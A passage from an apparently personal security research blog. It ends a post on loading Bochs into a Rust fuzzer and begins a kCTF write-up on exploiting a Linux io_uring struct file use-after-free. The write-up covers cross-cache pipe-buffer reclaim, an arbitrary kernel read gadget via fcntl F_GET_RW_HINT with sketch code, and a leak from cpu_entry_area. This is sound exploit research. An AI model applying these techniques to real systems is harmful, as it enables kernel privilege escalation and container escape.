<p>The last piece of information I think worth noting here is that I created a constant called <code class="language-plaintext highlighter-rouge">STACK_DATA_MAX</code> and the length of the stack data cannot be more than that tunable value. We use this value to set up <code class="language-plaintext highlighter-rouge">RSP</code> when we jump to the program in memory and start executing. <code class="language-plaintext highlighter-rouge">RSP</code> is set to the lowest address that still leaves room for the stack data, which is the stack allocation size - <code class="language-plaintext highlighter-rouge">STACK_DATA_MAX</code> bytes into the allocation. This way, when the stack grows, we have left the maximum amount of slack space possible for the stack to grow into since the stack grows down in memory.</p>
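<p>The arithmetic can be sketched as follows. The 1MB stack size comes from the post, but the value used for <code class="language-plaintext highlighter-rouge">STACK_DATA_MAX</code> and the <code class="language-plaintext highlighter-rouge">initial_rsp</code> helper are assumptions made up for this example.</p>

```rust
const STACK_SIZE: usize = 0x10_0000; // 1MB, as mentioned in the post
const STACK_DATA_MAX: usize = 0x1000; // hypothetical value for the tunable

// Hypothetical helper: returns the address RSP should hold given the base of
// the stack allocation, or None if the stack data would not fit
fn initial_rsp(stack_base: usize, data_len: usize) -> Option<usize> {
    if data_len > STACK_DATA_MAX {
        return None;
    }

    // Everything below this address is slack the stack can grow down into
    Some(stack_base + STACK_SIZE - STACK_DATA_MAX)
}

fn main() {
    let stack_base = 0x7f00_0000_0000usize; // made-up mmap result
    let rsp = initial_rsp(stack_base, 112).expect("stack data too large");

    // The slack space is everything between the base and RSP
    assert_eq!(rsp - stack_base, STACK_SIZE - STACK_DATA_MAX);
    println!("RSP: {:#X}", rsp);
}
```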

<h2 id="executing-the-loaded-program">Executing the Loaded Program</h2>
<p>Everything at this point should be set up perfectly in memory and all we have to do is jump to the target code and start executing. For now, I haven’t fleshed out a context switching routine or anything; we’re literally just going to jump to the program, execute it, and hope everything goes well. The code I used to achieve this is very simple:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">pub</span> <span class="k">fn</span> <span class="nf">start_bochs</span><span class="p">(</span><span class="n">bochs</span><span class="p">:</span> <span class="n">Bochs</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Set RAX to our jump destination which is the program entry, clear RDX,</span>
    <span class="c1">// and set RSP to the correct value</span>
    <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nd">asm!</span><span class="p">(</span>
            <span class="s">"mov rax, {0}"</span><span class="p">,</span>
            <span class="s">"mov rsp, {1}"</span><span class="p">,</span>
            <span class="s">"xor rdx, rdx"</span><span class="p">,</span>
            <span class="s">"jmp rax"</span><span class="p">,</span>
            <span class="k">in</span><span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="n">bochs</span><span class="py">.entry</span><span class="p">,</span>
            <span class="k">in</span><span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="n">bochs</span><span class="py">.rsp</span><span class="p">,</span>
        <span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The reason we clear <code class="language-plaintext highlighter-rouge">RDX</code> is because if the <code class="language-plaintext highlighter-rouge">_start</code> routine sees a non-zero value in <code class="language-plaintext highlighter-rouge">RDX</code>, it will interpret that to mean that we are attempting to register a hook located at the address in <code class="language-plaintext highlighter-rouge">RDX</code> to be invoked when the program exits. We don’t have one we want to run, so for now we <code class="language-plaintext highlighter-rouge">NULL</code> it out. The other register values don’t really matter. We move the program entry point into <code class="language-plaintext highlighter-rouge">RAX</code> and use it as the jump target, and we supply our handcrafted <code class="language-plaintext highlighter-rouge">RSP</code> so that the program has a stack to use to do its relocations and run properly.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">dude@lol:~/lucid/target/release$</span><span class="w"> </span>./lucid <span class="nt">--bochs-args</span> <span class="nt">-AAAAA</span> <span class="nt">-BBBBBBBBBB</span>
<span class="gp">[17:43:19] lucid&gt;</span><span class="w"> </span>Loading Bochs...
<span class="gp">[17:43:19] lucid&gt;</span><span class="w"> </span>Bochs loaded <span class="o">{</span> Entry: 0x19F50, RSP: 0x7F513F11C000 <span class="o">}</span>
<span class="go">Argument count: 3
Args:
   -./bochs
   --AAAAA
   --BBBBBBBBBB
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
</span><span class="gp">dude@lol:~/lucid/target/release$</span><span class="w"> 
</span></code></pre></div></div>

<p>The program runs, parses our command line args, and exits all without crashing! So it looks like everything is good to go. This would normally be a good stopping place, but I was morbidly curious…</p>

<h2 id="will-bochs-run">Will Bochs Run?</h2>
<p>We have to see right? First we have to compile Bochs as a <code class="language-plaintext highlighter-rouge">-static-pie</code> ELF which was a headache in itself, but I was able to figure it out.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">dude@lol:~/lucid/target/release$</span><span class="w"> </span>./lucid <span class="nt">--bochs-args</span> <span class="nt">-AAAAA</span> <span class="nt">-BBBBBBBBBB</span>
<span class="gp">[12:30:40] lucid&gt;</span><span class="w"> </span>Loading Bochs...
<span class="gp">[12:30:40] lucid&gt;</span><span class="w"> </span>Bochs loaded <span class="o">{</span> Entry: 0xA3DB0, RSP: 0x7FEB0F565000 <span class="o">}</span>
<span class="go">========================================================================
                        Bochs x86 Emulator 2.7
              Built from SVN snapshot on August  1, 2021
                Timestamp: Sun Aug  1 10:07:00 CEST 2021
========================================================================
Usage: bochs [flags] [bochsrc options]

  -n               no configuration file
  -f configfile    specify configuration file
  -q               quick start (skip configuration interface)
  -benchmark N     run Bochs in benchmark mode for N millions of emulated ticks
  -dumpstats N     dump Bochs stats every N millions of emulated ticks
  -r path          restore the Bochs state from path
  -log filename    specify Bochs log file name
  -unlock          unlock Bochs images leftover from previous session
  --help           display this help and exit
  --help features  display available features / devices and exit
  --help cpu       display supported CPU models and exit

For information on Bochs configuration file arguments, see the
bochsrc section in the user documentation or the man page of bochsrc.
</span><span class="gp">00000000000p[      ] &gt;</span><span class="o">&gt;</span>PANIC<span class="o">&lt;&lt;</span> <span class="no">command</span><span class="sh"> line arg '-AAAAA' was not understood
</span><span class="go">00000000000e[SIM   ] notify called, but no bxevent_callback function is registered
========================================================================
Bochs is exiting with the following message:
[      ] command line arg '-AAAAA' was not understood
========================================================================
00000000000i[SIM   ] quit_sim called with exit code 1
</span></code></pre></div></div>

<p>Bochs runs! It couldn’t make sense of our nonsense command line arguments, but we loaded it and ran it successfully.</p>

<h2 id="next-steps">Next Steps</h2>
<p>The very next step and blog post will be developing a context-switching routine that we will use to transition between Fuzzer execution and Bochs execution. This will involve saving our state each time and will function basically the same way a normal user-to-kernel context switch does.</p>

<p>After that, we have to get very familiar with Bochs and attempt to get a target up and running in vanilla Bochs. Once we do that, we’ll try to run that in the Fuzzer.</p>

<h2 id="resources">Resources</h2>
<ul>
  <li>I used this excellent blogpost from Faster Than Lime a lot when learning about how to load ELFs in memory: <a href="https://fasterthanli.me/series/making-our-own-executable-packer/part-17">https://fasterthanli.me/series/making-our-own-executable-packer/part-17</a>.</li>
  <li>Also shoutout @netspooky for helping me understand the stack layout!</li>
  <li>Thank you to ChatGPT as well, for being my sounding board (even if you failed to help me with my stack creation bugs)</li>
</ul>

<h2 id="code">Code</h2>
<p><a href="https://github.com/h0mbre/Lucid">https://github.com/h0mbre/Lucid</a></p>]]></content><author><name></name></author><category term="Fuzzing" /><category term="Fuzzer" /><category term="Development" /><category term="Emulator" /><category term="Bochs" /><summary type="html"><![CDATA[Introduction &amp;&amp; Credit to Gamozolabs For a long time I’ve wanted to develop a fuzzer on the blog during my weekends and freetime, but for one reason or another, I could never really conceptualize a project that would be not only worthwhile as an educational tool, but also offer some utility to the fuzzing community in general. Recently, for Linux Kernel exploitation reasons, I’ve been very interested in Nyx. Nyx is a KVM-based hypervisor fuzzer that you can use to snapshot fuzz traditionally hard to fuzz targets. A lot of the time (most of the time?), we want to fuzz things that don’t naturally lend themselves well to traditional fuzzing approaches. When faced with target complexity in fuzzing (leaving input generation and nuance aside for now), there have generally been two approaches.]]></summary></entry><entry><title type="html">Escaping the Google kCTF Container with a Data-Only Exploit</title><link href="https://h0mbre.github.io/kCTF_Data_Only_Exploit/" rel="alternate" type="text/html" title="Escaping the Google kCTF Container with a Data-Only Exploit" /><published>2023-07-29T00:00:00+00:00</published><updated>2023-07-29T00:00:00+00:00</updated><id>https://h0mbre.github.io/kCTF_Data_Only_Exploit</id><content type="html" xml:base="https://h0mbre.github.io/kCTF_Data_Only_Exploit/"><![CDATA[<h2 id="introduction">Introduction</h2>
<p>I’ve been doing some Linux kernel exploit development/study and vulnerability research off and on since last Fall and a few months ago I had some downtime on vacation to sit and challenge myself to write my first data-only exploit for a real bug that was exploited in kCTF. <code class="language-plaintext highlighter-rouge">io_uring</code> has been a popular target in the program’s history up to this point, so I thought I’d find an easy-to-reason-about bug there that had already been exploited as fertile ground for exploit development creativity. The bug I chose to work with was one which resulted in a <code class="language-plaintext highlighter-rouge">struct file</code> UAF where it was possible to hold an open file descriptor to the freed object. There have been quite a few write-ups on <code class="language-plaintext highlighter-rouge">file</code> UAF exploits, so I decided as a challenge that my exploit had to be data-only. The parameters of the self-imposed challenge were completely arbitrary, but I just wanted to try writing an exploit that didn’t rely on hijacking control flow. I have written quite a few Linux kernel exploits of real kCTF bugs at this point, probably 5-6 as practice, just starting with the vulnerability and going from there, but all of them have ended up with me using ROP, so this was my first try at data-only. I also had not seen a data-only exploit for a <code class="language-plaintext highlighter-rouge">struct file</code> UAF yet, which was encouraging as it seemed it was worthwhile “research”. Also, before we get too far, please do not message me to tell me that someone already did xyz years prior. I’m very new to this type of thing and was just doing this as a personal challenge; if some aspects of the exploit are unoriginal, that is by coincidence. I will do my best to cite all my inspiration as we go.</p>

<h2 id="the-bug">The Bug</h2>
<p>The <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=fc7222c3a9f56271fba02aabbfbae999042f1679">bug</a> is extremely simple (why can’t I find one like this?) and was exploited in <a href="https://docs.google.com/spreadsheets/d/e/2PACX-1vS1REdTA29OJftst8xN5B5x8iIUcxuK6bXdzF8G1UXCmRtoNsoQ9MbebdRdFnj6qZ0Yd7LwQfvYC2oF/pubhtml#">kCTF</a> in November of last year. I didn’t look very hard or ask around in the kCTF discord, but I was not able to find a PoC for this particular exploit. I was able to find several good write-ups of exploits leveraging similar vulnerabilities, especially this one by <a href="https://twitter.com/pqlqpql">pqlpql</a> and <a href="https://twitter.com/Awarau1">Awarau</a>: <a href="https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/">https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/</a>.</p>

<p>I won’t go into the bug very much because it wasn’t really important to the exercise of being creative and writing a new kind of exploit (new for me); however, as you can tell from the patch, there was a call to put (decrease) a reference to a file without first checking if the file was a fixed file in the io_uring. There is this concept of fixed files which are managed by the io_uring itself, and there was this pattern throughout that codebase of doing checks on request files before putting them to ensure that they were not fixed files, and in this instance you can see that the check was not performed. So we are able from userspace to open a file (refcount == 1), register the file as a fixed file (refcount == 2), call into the buggy code path by submitting an <code class="language-plaintext highlighter-rouge">IORING_OP_MSG_RING</code> request which, upon completion, will erroneously decrement the refcount (refcount == 1), and then finally, call <code class="language-plaintext highlighter-rouge">io_uring_unregister_files</code> which ends up decrementing the refcount to 0 and freeing the file while we still maintain an open file descriptor for it. This is about as good as bugs get. I need to find one of these.</p>
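
<p>To make the refcount sequence easier to follow, here is a toy userspace model of it. This is only a sketch: <code class="language-plaintext highlighter-rouge">toy_file</code>, <code class="language-plaintext highlighter-rouge">toy_put</code> and <code class="language-plaintext highlighter-rouge">toy_trigger_uaf</code> are names I made up for illustration, none of them are kernel APIs, and nothing here touches io_uring.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;assert.h&gt;
#include &lt;stdbool.h&gt;

/* Toy userspace model of the refcount sequence; not kernel code. */
struct toy_file {
    int  refcount;
    bool freed;
    bool fd_open;   /* userspace still holds a descriptor */
};

/* Drop one reference and "free" the object when the count hits zero. */
static void toy_put(struct toy_file *f)
{
    assert(f-&gt;refcount &gt; 0);
    if (--f-&gt;refcount == 0)
        f-&gt;freed = true;
}

/* Returns true if the sequence ends with a freed file and a live fd. */
static bool toy_trigger_uaf(void)
{
    /* open(): refcount == 1 */
    struct toy_file f = { .refcount = 1, .freed = false, .fd_open = true };

    f.refcount++;    /* register as a fixed file: refcount == 2 */
    toy_put(&amp;f);     /* buggy put on IORING_OP_MSG_RING completion: refcount == 1 */
    toy_put(&amp;f);     /* unregister fixed files: refcount == 0, object freed */

    return f.freed &amp;&amp; f.fd_open;
}
</code></pre></div></div>
<p>The point of the model is the last line: the object is gone, but the descriptor that refers to it is not.</p>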

<p>What sort of variant analysis can we perform on this type of bug? I’m not so sure, it seems to be a broad category. But the careful code reviewer might have noticed that everywhere else in the codebase when there was the potential of putting a request file, the authors made sure to check if the file was fixed or not. This file put forgot to perform the check. The broad lesson I learned from this was to try and find instances of an action being performed multiple times in a codebase and look for discrepancies between those routines.</p>

<h2 id="giant-shoulders">Giant Shoulders</h2>
<p>It’s extremely important to stress that the blogpost I linked above from @pqlpql and @Awarau1 was very instrumental to this process. In that blogpost they broke down in exquisite detail how to coerce the Linux kernel to free an entire page of <code class="language-plaintext highlighter-rouge">file</code> objects back to the page allocator by utilizing a technique called “cross-cache”. <code class="language-plaintext highlighter-rouge">file</code> structs have their own dedicated cache in the kernel and so typical object replacement shenanigans in UAF situations aren’t very useful in this instance, regardless of the <code class="language-plaintext highlighter-rouge">struct file</code> size. Thanks to their blogpost, the concept of “cross-cache” has been used and discussed more and more, at least on Twitter from my anecdotal experience.</p>

<p>Instead of using this trick of getting our entire victim page of <code class="language-plaintext highlighter-rouge">file</code> objects sent back to the page allocator only to have the page used as the backing for general cache objects, I elected to have the page reallocated in the form of a pipe buffer. Please see this <a href="https://org.anize.rs/HITCON-2022/pwn/fourchain-kernel">blogpost</a> by <a href="https://twitter.com/pqlqpql">@pqlpql</a> for more information (this is a great writeup in general). This is an extremely powerful technique because we control all of the contents of the pipe buffer (via writes) and we can read 100% of the page contents (via reads). It’s also extremely reliable in my experience. I’m not going to go into too much depth here because this wasn’t any of my doing, this is 100% the people mentioned thus far. Please go read the material from them.</p>

<h2 id="arbitrary-read">Arbitrary Read</h2>
<p>The first thing I started to look for was a way to leak data, because I’ve been hardwired to think that all Linux kernel exploits follow the same pattern of achieving a leak which defeats KASLR, finding some valuable objects in memory, overwriting a function pointer blah blah blah. (Turns out this is not the case and some really talented people have really opened my mind in this area.) The only thing I knew for certain at this point was that I had an open file descriptor at my disposal, so let’s go looking around the file system code in the Linux kernel. One of the first things that caught my eye was the <code class="language-plaintext highlighter-rouge">fcntl</code> syscall in <code class="language-plaintext highlighter-rouge">fs/fcntl.c</code>. In general, what I was doing at this point was going through syscall tables for the Linux kernel and seeing which syscalls took an <code class="language-plaintext highlighter-rouge">fd</code> as an argument. From there, I would visit the portion of the kernel codebase which handled that syscall implementation and I would <code class="language-plaintext highlighter-rouge">ctrl-f</code> for the function <code class="language-plaintext highlighter-rouge">copy_to_user</code>. This seemed like a relatively logical way to find a method of leaking data back to userspace.</p>

<p>The <code class="language-plaintext highlighter-rouge">copy_to_user</code> function is a key part of the Linux kernel’s interface with user space. It’s used to copy data from the kernel’s own memory space into the memory space of a user process. This function ensures that the copy is done safely, respecting the separation between user and kernel memory.</p>

<p>Now if you go to the <a href="https://elixir.bootlin.com/linux/v5.19/source/fs/fcntl.c">source code</a> and do the find on <code class="language-plaintext highlighter-rouge">copy_to_user</code>, the 2nd result is a snippet in this bit right here:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">long</span> <span class="nf">fcntl_rw_hint</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">cmd</span><span class="p">,</span>
			  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">arg</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">inode</span> <span class="o">=</span> <span class="n">file_inode</span><span class="p">(</span><span class="n">file</span><span class="p">);</span>
	<span class="n">u64</span> <span class="n">__user</span> <span class="o">*</span><span class="n">argp</span> <span class="o">=</span> <span class="p">(</span><span class="n">u64</span> <span class="n">__user</span> <span class="o">*</span><span class="p">)</span><span class="n">arg</span><span class="p">;</span>
	<span class="k">enum</span> <span class="n">rw_hint</span> <span class="n">hint</span><span class="p">;</span>
	<span class="n">u64</span> <span class="n">h</span><span class="p">;</span>

	<span class="k">switch</span> <span class="p">(</span><span class="n">cmd</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">case</span> <span class="n">F_GET_RW_HINT</span><span class="p">:</span>
		<span class="n">h</span> <span class="o">=</span> <span class="n">inode</span><span class="o">-&gt;</span><span class="n">i_write_hint</span><span class="p">;</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">copy_to_user</span><span class="p">(</span><span class="n">argp</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">h</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="o">*</span><span class="n">argp</span><span class="p">)))</span>
			<span class="k">return</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
		<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">case</span> <span class="n">F_SET_RW_HINT</span><span class="p">:</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">copy_from_user</span><span class="p">(</span><span class="o">&amp;</span><span class="n">h</span><span class="p">,</span> <span class="n">argp</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">h</span><span class="p">)))</span>
			<span class="k">return</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
		<span class="n">hint</span> <span class="o">=</span> <span class="p">(</span><span class="k">enum</span> <span class="n">rw_hint</span><span class="p">)</span> <span class="n">h</span><span class="p">;</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">rw_hint_valid</span><span class="p">(</span><span class="n">hint</span><span class="p">))</span>
			<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>

		<span class="n">inode_lock</span><span class="p">(</span><span class="n">inode</span><span class="p">);</span>
		<span class="n">inode</span><span class="o">-&gt;</span><span class="n">i_write_hint</span> <span class="o">=</span> <span class="n">hint</span><span class="p">;</span>
		<span class="n">inode_unlock</span><span class="p">(</span><span class="n">inode</span><span class="p">);</span>
		<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
	<span class="nl">default:</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
	<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>You can see that in the <code class="language-plaintext highlighter-rouge">F_GET_RW_HINT</code> case, a <code class="language-plaintext highlighter-rouge">u64</code> (“h”), is copied back to userspace. That value comes from the value of <code class="language-plaintext highlighter-rouge">inode-&gt;i_write_hint</code>. And <code class="language-plaintext highlighter-rouge">inode</code> itself is returned from <code class="language-plaintext highlighter-rouge">file_inode(file)</code>. The source code for that function is as follows:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="nf">file_inode</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">f</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">return</span> <span class="n">f</span><span class="o">-&gt;</span><span class="n">f_inode</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Lol, well then. If we control the <code class="language-plaintext highlighter-rouge">file</code>, then we control the <code class="language-plaintext highlighter-rouge">inode</code> as well. A <code class="language-plaintext highlighter-rouge">struct file</code> looks like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">file</span> <span class="p">{</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="k">struct</span> <span class="n">llist_node</span>	<span class="n">fu_llist</span><span class="p">;</span>
		<span class="k">struct</span> <span class="n">rcu_head</span> 	<span class="n">fu_rcuhead</span><span class="p">;</span>
	<span class="p">}</span> <span class="n">f_u</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">path</span>		<span class="n">f_path</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">inode</span>		<span class="o">*</span><span class="n">f_inode</span><span class="p">;</span>	<span class="cm">/* cached value */</span>
<span class="o">&lt;</span><span class="n">SNIP</span><span class="o">&gt;</span>
</code></pre></div></div>

<p>And since we’re using the pipe buffer as our replacement object (really the entire page), we can set <code class="language-plaintext highlighter-rouge">inode</code> to be an arbitrary address. Let’s go check out the <code class="language-plaintext highlighter-rouge">inode</code> struct and see what we can learn about this <code class="language-plaintext highlighter-rouge">i_write_hint</code> member.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">inode</span> <span class="p">{</span>
	<span class="n">umode_t</span>			<span class="n">i_mode</span><span class="p">;</span>
	<span class="kt">unsigned</span> <span class="kt">short</span>		<span class="n">i_opflags</span><span class="p">;</span>
	<span class="n">kuid_t</span>			<span class="n">i_uid</span><span class="p">;</span>
	<span class="n">kgid_t</span>			<span class="n">i_gid</span><span class="p">;</span>
	<span class="kt">unsigned</span> <span class="kt">int</span>		<span class="n">i_flags</span><span class="p">;</span>

<span class="cp">#ifdef CONFIG_FS_POSIX_ACL
</span>	<span class="k">struct</span> <span class="n">posix_acl</span>	<span class="o">*</span><span class="n">i_acl</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">posix_acl</span>	<span class="o">*</span><span class="n">i_default_acl</span><span class="p">;</span>
<span class="cp">#endif
</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">inode_operations</span>	<span class="o">*</span><span class="n">i_op</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">super_block</span>	<span class="o">*</span><span class="n">i_sb</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">address_space</span>	<span class="o">*</span><span class="n">i_mapping</span><span class="p">;</span>

<span class="cp">#ifdef CONFIG_SECURITY
</span>	<span class="kt">void</span>			<span class="o">*</span><span class="n">i_security</span><span class="p">;</span>
<span class="cp">#endif
</span>
	<span class="cm">/* Stat data, not accessed from path walking */</span>
	<span class="kt">unsigned</span> <span class="kt">long</span>		<span class="n">i_ino</span><span class="p">;</span>
	<span class="cm">/*
	 * Filesystems may only read i_nlink directly.  They shall use the
	 * following functions for modification:
	 *
	 *    (set|clear|inc|drop)_nlink
	 *    inode_(inc|dec)_link_count
	 */</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="k">const</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">i_nlink</span><span class="p">;</span>
		<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">__i_nlink</span><span class="p">;</span>
	<span class="p">};</span>
	<span class="n">dev_t</span>			<span class="n">i_rdev</span><span class="p">;</span>
	<span class="n">loff_t</span>			<span class="n">i_size</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">timespec64</span>	<span class="n">i_atime</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">timespec64</span>	<span class="n">i_mtime</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">timespec64</span>	<span class="n">i_ctime</span><span class="p">;</span>
	<span class="n">spinlock_t</span>		<span class="n">i_lock</span><span class="p">;</span>	<span class="cm">/* i_blocks, i_bytes, maybe i_size */</span>
	<span class="kt">unsigned</span> <span class="kt">short</span>          <span class="n">i_bytes</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">i_blkbits</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">i_write_hint</span><span class="p">;</span>
<span class="o">&lt;</span><span class="n">SNIP</span><span class="o">&gt;</span>
</code></pre></div></div>
<p>So <code class="language-plaintext highlighter-rouge">i_write_hint</code> is a <code class="language-plaintext highlighter-rouge">u8</code>, aka, a single byte. This is perfect for what we need, <code class="language-plaintext highlighter-rouge">inode</code> becomes the address from which we read a byte back to userland (plus the offset to the member).</p>

<p>Since we control 100% of the backing data of the <code class="language-plaintext highlighter-rouge">file</code>, we thus control the value of the <code class="language-plaintext highlighter-rouge">inode</code> member. So if we set up a fake <code class="language-plaintext highlighter-rouge">file</code> struct in memory via our pipe buffer and have the <code class="language-plaintext highlighter-rouge">inode</code> member be <code class="language-plaintext highlighter-rouge">0x1337</code>, the kernel will try to deref <code class="language-plaintext highlighter-rouge">0x1337</code> as an address and then read a byte at the offset of the <code class="language-plaintext highlighter-rouge">i_write_hint</code> member. So this is an arbitrary read for us, and we found it in the dumbest way possible.</p>
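
<p>Here is a rough sketch of the pointer math behind that read, assuming a little userspace model instead of a real kernel. <code class="language-plaintext highlighter-rouge">I_WRITE_HINT_OFF</code> is a placeholder value (the real offset depends on the kernel build), and <code class="language-plaintext highlighter-rouge">leak_byte_fn</code>, <code class="language-plaintext highlighter-rouge">read_u64</code> and <code class="language-plaintext highlighter-rouge">sim_leak</code> are hypothetical helpers that are not taken from my exploit. In a real exploit the callback would rewrite the fake <code class="language-plaintext highlighter-rouge">file</code> through the pipe and then call <code class="language-plaintext highlighter-rouge">fcntl(fd, F_GET_RW_HINT, &amp;h)</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdint.h&gt;

/* PLACEHOLDER: offset of i_write_hint inside struct inode. It depends on the
 * kernel build and config; this value is for illustration only. */
#define I_WRITE_HINT_OFF 0x8fUL

/* Value to plant in the fake file's f_inode so that inode-&gt;i_write_hint
 * aliases the byte at `target`. */
static uint64_t fake_inode_for(uint64_t target)
{
    return target - I_WRITE_HINT_OFF;
}

/* Hypothetical callback: plants `f_inode` in the fake file, triggers
 * F_GET_RW_HINT and returns the single byte that comes back. */
typedef uint8_t (*leak_byte_fn)(uint64_t f_inode, void *opaque);

/* Build a 64-bit value out of eight one-byte reads, lowest byte first. */
static uint64_t read_u64(uint64_t addr, leak_byte_fn leak, void *opaque)
{
    uint64_t val = 0;
    for (unsigned i = 0; i &lt; 8; i++)
        val |= (uint64_t)leak(fake_inode_for(addr + i), opaque) &lt;&lt; (8 * i);
    return val;
}

/* Stand-in for the kernel in this sketch: `opaque` is a byte buffer that
 * plays the role of memory starting at address 0. */
static uint8_t sim_leak(uint64_t f_inode, void *opaque)
{
    const uint8_t *mem = opaque;
    return mem[f_inode + I_WRITE_HINT_OFF];   /* h = inode-&gt;i_write_hint */
}
</code></pre></div></div>
<p>Since each call only yields one byte, reading a full pointer costs eight round trips, which was never a problem in practice for the handful of values we need.</p>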

<p>This was really encouraging for me that we found an arbitrary read gadget so quickly, but what should we aim the read at?</p>

<h2 id="finding-a-read-target">Finding a Read Target</h2>
<p>So we can read data at any address we want, but we don’t know what to read. I struggled thinking about this for a while, but then remembered that the <code class="language-plaintext highlighter-rouge">cpu_entry_area</code> was not randomized from boot to boot; it is always at the same address. I knew this from the above blogpost about the <code class="language-plaintext highlighter-rouge">file</code> UAF, but also vaguely from <a href="https://twitter.com/ky1ebot">@ky1ebot</a> tweets like <a href="https://twitter.com/ky1ebot/status/1601231194062192640?s=20">this one</a>.</p>

<p><code class="language-plaintext highlighter-rouge">cpu_entry_area</code> is a special per-CPU area in the kernel that is used to handle some types of interrupts and exceptions. There is this concept of <a href="https://docs.kernel.org/next/x86/kernel-stacks.html">Interrupt Stacks</a> in the kernel that can be used in the event that an exception must be handled for instance.</p>

<p>After doing some debugging with GDB, I noticed that there was at least one kernel text pointer that showed up in the <code class="language-plaintext highlighter-rouge">cpu_entry_area</code> consistently and that was an address inside the <code class="language-plaintext highlighter-rouge">error_entry</code> function which is as follows:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">SYM_CODE_START_LOCAL</span><span class="p">(</span><span class="n">error_entry</span><span class="p">)</span>
	<span class="n">UNWIND_HINT_FUNC</span>

	<span class="n">PUSH_AND_CLEAR_REGS</span> <span class="n">save_ret</span><span class="o">=</span><span class="mi">1</span>
	<span class="n">ENCODE_FRAME_POINTER</span> <span class="mi">8</span>

	<span class="n">testb</span>	<span class="err">$</span><span class="mi">3</span><span class="p">,</span> <span class="n">CS</span><span class="o">+</span><span class="mi">8</span><span class="p">(</span><span class="o">%</span><span class="n">rsp</span><span class="p">)</span>
	<span class="n">jz</span>	<span class="p">.</span><span class="n">Lerror_kernelspace</span>

	<span class="cm">/*
	 * We entered from user mode or we're pretending to have entered
	 * from user mode due to an IRET fault.
	 */</span>
	<span class="n">swapgs</span>
	<span class="n">FENCE_SWAPGS_USER_ENTRY</span>
	<span class="cm">/* We have user CR3.  Change to kernel CR3. */</span>
	<span class="n">SWITCH_TO_KERNEL_CR3</span> <span class="n">scratch_reg</span><span class="o">=%</span><span class="n">rax</span>
	<span class="n">IBRS_ENTER</span>
	<span class="n">UNTRAIN_RET</span>

	<span class="n">leaq</span>	<span class="mi">8</span><span class="p">(</span><span class="o">%</span><span class="n">rsp</span><span class="p">),</span> <span class="o">%</span><span class="n">rdi</span>			<span class="cm">/* arg0 = pt_regs pointer */</span>
<span class="p">.</span><span class="n">Lerror_entry_from_usermode_after_swapgs</span><span class="o">:</span>

	<span class="cm">/* Put us onto the real thread stack. */</span>
	<span class="n">call</span>	<span class="n">sync_regs</span>
	<span class="n">RET</span>
<span class="o">&lt;</span><span class="n">SNIP</span><span class="o">&gt;</span>
</code></pre></div></div>

